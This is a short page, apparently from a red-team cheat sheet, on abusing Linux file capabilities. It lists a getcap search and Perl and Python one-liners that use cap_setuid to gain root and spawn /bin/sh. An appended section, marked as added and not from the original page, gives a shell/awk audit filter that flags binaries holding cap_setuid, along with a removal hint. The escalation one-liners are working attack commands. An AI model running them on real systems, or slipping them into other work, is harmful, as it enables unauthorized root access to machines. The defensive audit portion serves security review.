>_ shadow.red

Linux Capabilities Abuse


Find capabilities

getcap -r / 2>/dev/null

Perl with cap_setuid+ep

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

Python with cap_setuid+ep

python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
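
Added example (not from the original page): an audit filter for the getcap output above that lists only files holding cap_setuid in both the effective and permitted sets, the condition the Perl and Python entries rely on. The sample lines and the /opt/demo paths are constructed, and paths are assumed to contain no whitespace.

```shell
#!/bin/sh
# Added example: list files from `getcap -r` output whose cap_setuid is
# both effective (e) and permitted (p).
# Handles the older "path = caps+ep" and the newer "path caps=ep" formats.
# Assumption: paths contain no whitespace.
flag_setuid_caps() {
    awk '
    {
        for (i = 2; i <= NF; i++) {
            clause = $i
            n = match(clause, /[=+][eip]+$/)    # start of the flag suffix
            if (n == 0) continue                 # bare "=" separator or unknown
            names = substr(clause, 1, n - 1)
            flags = substr(clause, n + 1)
            if (index(flags, "e") == 0 || index(flags, "p") == 0) continue
            # An empty name list written as "=ep" means every capability.
            all = (names == "" && substr(clause, n, 1) == "=")
            if (all || index("," names ",", ",cap_setuid,")) {
                print $1
                break
            }
        }
    }'
}

# Constructed sample of getcap output (not captured from a real host).
sample_getcap_output() {
    cat <<'EOF'
/usr/bin/ping cap_net_raw=ep
/usr/bin/perl = cap_setuid+ep
/usr/bin/python3.10 cap_setuid=ep
/opt/demo/inherit-only cap_setuid=i
/opt/demo/multi cap_net_bind_service,cap_setuid=eip
/opt/demo/allcaps =ep
EOF
}

sample_getcap_output | flag_setuid_caps
```

On a live system, pipe `getcap -r / 2>/dev/null` into `flag_setuid_caps`; `setcap -r <path>` removes the file capabilities from an entry that should not have them.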

Reference

https://www.insecure.ws/linux/getcap_setcap.html#getcap-setcap-and-file-capabilities